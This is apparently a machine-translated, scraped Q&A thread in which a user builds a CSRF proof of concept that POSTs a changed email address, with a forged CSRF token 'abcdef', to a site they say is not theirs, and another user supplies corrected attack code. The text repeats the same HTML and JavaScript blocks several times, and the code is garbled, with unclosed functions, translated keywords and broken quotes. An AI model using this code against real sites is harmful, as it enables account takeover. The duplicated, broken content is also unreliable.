Javascript 使用指定的CSRF令牌向服务器发送HTTP Post请求
说明:Javascript 使用指定的CSRF令牌向服务器发送HTTP Post请求,javascript,html,ajax,token,csrf,Javascript,Html,Ajax,Token,Csrf,说明: <form action="http://www.example.com/change-mail" method="post"> <input type="submit"> <input type="hidden" name="email" value="newemail@gmail.com"> <!-- TODO: Send the CSRF-Token "abcdef" with it too
<form action="http://www.example.com/change-mail" method="post">
<input type="submit">
<input type="hidden" name="email" value="newemail@gmail.com">
<!-- TODO: Send the CSRF-Token "abcdef" with it too! -->
</form>
<!DOCTYPE html>
<html>
<head>
<script type="text/javascript" src="test.js"></script>
</head>
<body>
<b>Email</b><br><br>
<form id="email">
<label for="email"> Email : </label>
<input type="text" id="email" />
<br><br>
<input type="button" id="email" value="email"/>
</form>
</body>
</html>
<script>
window.addEventListener('DOMContentLoaded', function() {
var email = document.querySelector('input#email');
email.addEventListener('click', function() {
var emailStr = email.value,
url="http://www.example.com/change-mail";
if (window.XMLHttpRequest) {
xmlHttpReq = new XMLHttpRequest();
}
else if (window.ActiveXObject) {
xmlHttpReq = new ActiveXObject("Microsoft.XMLHTTP");
}
xmlHttpReq.open('POST', url, true);
xmlHttpReq.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
xmlHttpReq.setRequestHeader('X-CSRF-Token', abcdef);
xmlHttpReq.send("email="+emailStr);
</script>
我正在尝试创建CSRF POC,但问题是www.example.com上需要CSRF令牌以防止CSRF攻击。
幸运的是,我成功地创建了一个始终有效的CSRF令牌;让我们说“abcdef”。因此,现在我可以创建一个工作的CSRF POC,只要我可以用它发送CSRF令牌。
比如说AJAX,这可能吗?我搜索了半个小时,但没有找到任何答案,但我想这是我的责任
这是我到目前为止的POC:
<form action="http://www.example.com/change-mail" method="post">
<input type="submit">
<input type="hidden" name="email" value="newemail@gmail.com">
<!-- TODO: Send the CSRF-Token "abcdef" with it too! -->
</form>
<!DOCTYPE html>
<html>
<head>
<script type="text/javascript" src="test.js"></script>
</head>
<body>
<b>Email</b><br><br>
<form id="email">
<label for="email"> Email : </label>
<input type="text" id="email" />
<br><br>
<input type="button" id="email" value="email"/>
</form>
</body>
</html>
<script>
window.addEventListener('DOMContentLoaded', function() {
var email = document.querySelector('input#email');
email.addEventListener('click', function() {
var emailStr = email.value,
url="http://www.example.com/change-mail";
if (window.XMLHttpRequest) {
xmlHttpReq = new XMLHttpRequest();
}
else if (window.ActiveXObject) {
xmlHttpReq = new ActiveXObject("Microsoft.XMLHTTP");
}
xmlHttpReq.open('POST', url, true);
xmlHttpReq.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
xmlHttpReq.setRequestHeader('X-CSRF-Token', abcdef);
xmlHttpReq.send("email="+emailStr);
</script>
谢谢你的帮助
编辑@Daniël
你喜欢这个工作吗
HTML部分:
<form action="http://www.example.com/change-mail" method="post">
<input type="submit">
<input type="hidden" name="email" value="newemail@gmail.com">
<!-- TODO: Send the CSRF-Token "abcdef" with it too! -->
</form>
<!DOCTYPE html>
<html>
<head>
<script type="text/javascript" src="test.js"></script>
</head>
<body>
<b>Email</b><br><br>
<form id="email">
<label for="email"> Email : </label>
<input type="text" id="email" />
<br><br>
<input type="button" id="email" value="email"/>
</form>
</body>
</html>
<script>
window.addEventListener('DOMContentLoaded', function() {
var email = document.querySelector('input#email');
email.addEventListener('click', function() {
var emailStr = email.value,
url="http://www.example.com/change-mail";
if (window.XMLHttpRequest) {
xmlHttpReq = new XMLHttpRequest();
}
else if (window.ActiveXObject) {
xmlHttpReq = new ActiveXObject("Microsoft.XMLHTTP");
}
xmlHttpReq.open('POST', url, true);
xmlHttpReq.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
xmlHttpReq.setRequestHeader('X-CSRF-Token', abcdef);
xmlHttpReq.send("email="+emailStr);
</script>
电子邮件
电邮:
Javascript部分:
<form action="http://www.example.com/change-mail" method="post">
<input type="submit">
<input type="hidden" name="email" value="newemail@gmail.com">
<!-- TODO: Send the CSRF-Token "abcdef" with it too! -->
</form>
<!DOCTYPE html>
<html>
<head>
<script type="text/javascript" src="test.js"></script>
</head>
<body>
<b>Email</b><br><br>
<form id="email">
<label for="email"> Email : </label>
<input type="text" id="email" />
<br><br>
<input type="button" id="email" value="email"/>
</form>
</body>
</html>
<script>
window.addEventListener('DOMContentLoaded', function() {
var email = document.querySelector('input#email');
email.addEventListener('click', function() {
var emailStr = email.value,
url="http://www.example.com/change-mail";
if (window.XMLHttpRequest) {
xmlHttpReq = new XMLHttpRequest();
}
else if (window.ActiveXObject) {
xmlHttpReq = new ActiveXObject("Microsoft.XMLHTTP");
}
xmlHttpReq.open('POST', url, true);
xmlHttpReq.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
xmlHttpReq.setRequestHeader('X-CSRF-Token', abcdef);
xmlHttpReq.send("email="+emailStr);
</script>
addEventListener('DOMContentLoaded',function(){
var email=document.querySelector('input#email');
email.addEventListener('click',function(){
var emailStr=email.value,
url=”http://www.example.com/change-mail";
if(window.XMLHttpRequest){
XMLHttpRequest=新的XMLHttpRequest();
}
else if(window.ActiveXObject){
xmlHttpReq=新的ActiveXObject(“Microsoft.XMLHTTP”);
}
xmlHttpReq.open('POST',url,true);
xmlHttpReq.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
xmlHttpReq.setRequestHeader('X-CSRF-Token',abcdef);
xmlHttpReq.send(“email=“+emailStr”);
提前谢谢,我也需要处理回复吗?
现在,当我点击“电子邮件”按钮时,在记录HTTP请求时什么也没有发生……太糟糕了。您当前的代码有很多问题,我已在下面更正了它
window.addEventListener('DOMContentLoaded',function(){
var email=document.querySelector('input#submit');
email.addEventListener('click',function(){
var emailStr=email.value,
url=”http://www.example.com/change-mail";
if(window.XMLHttpRequest){
XMLHttpRequest=新的XMLHttpRequest();
}
else if(window.ActiveXObject){
xmlHttpReq=新的ActiveXObject(“Microsoft.XMLHTTP”);
}
xmlHttpReq.open('POST',url,true);
xmlHttpReq.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
xmlHttpReq.setRequestHeader('X-CSRF-Token','abcdef');
xmlHttpReq.send(“email=“+emailStr”);
});
});
电子邮件
电邮:
谢谢Daniël!我如何组合ajax调用和post参数。我想我不能这么做:xhr.setRequestHeader('X-CSRF-Token',CSRF_Token)
如果这是一个愚蠢的问题,很抱歉。我不熟悉ajax和其他一些ISH。这是一个很好的问题,涵盖了一些javascript ajax表单交互。您可以发布ajax调用的javascript吗?您的确切意思是什么?为了确保www.example.com不是我的服务器。您需要编写javascript代码来进行ajax调用。查看我在这里的意思是:我真的很努力,但我发现很难……:')